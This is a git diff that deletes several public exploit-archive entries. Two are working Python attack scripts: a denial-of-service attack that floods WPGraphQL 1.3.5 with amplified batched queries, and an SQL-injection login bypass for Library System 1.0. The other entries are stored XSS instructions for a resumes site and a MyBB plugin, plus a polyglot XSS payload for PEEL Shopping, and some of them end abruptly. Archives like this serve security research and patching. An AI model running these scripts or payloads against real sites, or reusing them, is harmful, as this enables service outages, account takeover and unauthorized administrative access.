-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
\ No newline at end of file
diff --git a/exploits/php/dos/49807.py b/exploits/php/dos/49807.py
deleted file mode 100755
index f11d006d4..000000000
--- a/exploits/php/dos/49807.py
+++ /dev/null
@@ -1,55 +0,0 @@
-# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
-# Author: Dolev Farhi
-# Date: 2021-04-12
-# Vendor Homepage: https://www.wpgraphql.com/
-# Version: 1.3.5
-# Tested on: Ubuntu
-
-
-"""
- This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
-"""
-
-import sys
-import requests
-
-
-def usage():
- print('* WordPress GraphQL 1.3.5 Denial of Service *')
- print('python {} '.format(sys.argv[0]))
- print('python {} http://site.com 10000 100'.format(sys.argv[0]))
- sys.exit(1)
-
-if len(sys.argv) < 4:
- print('Missing arguments!')
- usage()
-
-def wpgql_exists():
- try:
- r = requests.post(WORDPRESS_URL, json='x')
- if 'GraphQL' in r.json()['errors'][0]['message']:
- return True
- except:
- pass
- return False
-
-# This PoC assumes graphql is located at index.php?graphql
-WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
-FORCE_MULTIPLIER = int(sys.argv[2])
-CHAINED_REQUESTS = int(sys.argv[3])
-
-if wpgql_exists is False:
- print('Could not identify GraphQL running at "/index.php?graphql"')
- sys.exit(1)
-
-queries = []
-
-payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
-query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
-
-for _ in range(0, CHAINED_REQUESTS):
- queries.append(query)
-
-r = requests.post(WORDPRESS_URL, json=queries)
-print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
-print('Response:', r.json())
\ No newline at end of file
diff --git a/exploits/php/webapps/49381.txt b/exploits/php/webapps/49381.txt
deleted file mode 100644
index afab72a5e..000000000
--- a/exploits/php/webapps/49381.txt
+++ /dev/null
@@ -1,12 +0,0 @@
-# Exploit Title: Resumes Management and Job Application Website 1.0 - Multiple Stored XSS
-# Date: 2/1/2021
-# Exploit Author: Saswat Subhajyoti Mallick
-# Vendor Homepage: https://egavilanmedia.com/
-# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
-# Version: 1.0
-# Tested on: windows 10/wamp
-
-Attacker can put stored xss and gain admin access unauthenticated .
-For stored XSS poc simply put in first name,last name and address field while applying for resume.
-
-Stored XSS will be activated the moment admin user logs in.
\ No newline at end of file
diff --git a/exploits/php/webapps/49462.py b/exploits/php/webapps/49462.py
deleted file mode 100755
index 3680f72d6..000000000
--- a/exploits/php/webapps/49462.py
+++ /dev/null
@@ -1,58 +0,0 @@
-# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
-# Exploit Author: Himanshu Shukla
-# Date: 2021-01-21
-# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
-# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
-# Version: 1.0
-# Tested On: Windows 10 + XAMPP 7.4.4
-# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
-#STEP 1 : Run The Exploit With This Command : python3 exploit.py
-#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
-#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
-
-#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
-
-import requests
-YELLOW = '\033[33m' # Yellow Text
-GREEN = '\033[32m' # Green Text
-RED = '\033[31m' # Red Text
-RESET = '\033[m' # reset to the defaults
-
-print(YELLOW+' _ ______ _ _ ___ ', RESET)
-print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
-print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
-print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
-print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
-print(YELLOW+" ", RESET)
-print('********************************************************')
-print('** LIBRARY SYSTEM 1.0 **')
-print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
-print('********************************************************')
-
-print('Author - Himanshu Shukla')
-
-
-#Create a new session
-
-s = requests.Session()
-
-#Set Cookie
-cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
-
-LINK=input("Enter URL of The Vulnarable Application : ")
-
-#Authentication Bypass
-print("[*]Attempting Authentication Bypass...")
-values = {"student":"'or 1 or'","login":""}
-r=s.post(LINK+'login.php', data=values, cookies=cookies)
-
-r=s.post(LINK+'login.php', data=values, cookies=cookies)
-
-#Check if Authentication was bypassed or not.
-logged_in = True if not("Student not found" in r.text) else False
-l=logged_in
-if l:
- print(GREEN+"[+]Authentication Bypass Successful!", RESET)
- print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
-else:
- print(RED+"[-]Failed To Authenticate!", RESET)
\ No newline at end of file
diff --git a/exploits/php/webapps/49467.txt b/exploits/php/webapps/49467.txt
deleted file mode 100644
index 42b742472..000000000
--- a/exploits/php/webapps/49467.txt
+++ /dev/null
@@ -1,29 +0,0 @@
-# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
-# Date: 1/21/2021
-# Author: 0xB9
-# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
-# Version: 1.0
-# Tested on: Windows 10
-
-1. Description:
-MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
-
-
-2. Proof of Concept:
-
-~ XSS via Thread/Post ~
-- Make a new thread or reply to an existing thread
-- Input a payload in either the thread title or main post itself
-Payload will execute when visiting your profile.
-
-~ XSS via Location/Bio ~
-- Go to User CP -> Edit Profile
-- Input a payload in the Location/Bio
-Payload will execute when visiting your profile.
-
-~ CSRF ~
-
\ No newline at end of file
diff --git a/exploits/php/webapps/49574.txt b/exploits/php/webapps/49574.txt
deleted file mode 100644
index b52b438f6..000000000
--- a/exploits/php/webapps/49574.txt
+++ /dev/null
@@ -1,19 +0,0 @@
-# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
-# Date: 2021-02-16
-# Exploit Author: Anmol K Sachan
-# Vendor Homepage: https://www.peel.fr/
-# Software Link: https://sourceforge.net/projects/peel-shopping/
-# Software: PEEL SHOPPING 9.3.0
-# Vulnerability Type: Stored Cross-site Scripting
-# Vulnerability: Stored XSS
-# Tested on Windows 10 XAMPP
-# This application is vulnerable to Stored XSS vulnerability.
-# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
-# Vulnerable parameters: 'Comments / Special Instructions :'
-# Payload used:
-
-jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
-)//%0D%0A%0d%0a//\x3csVg/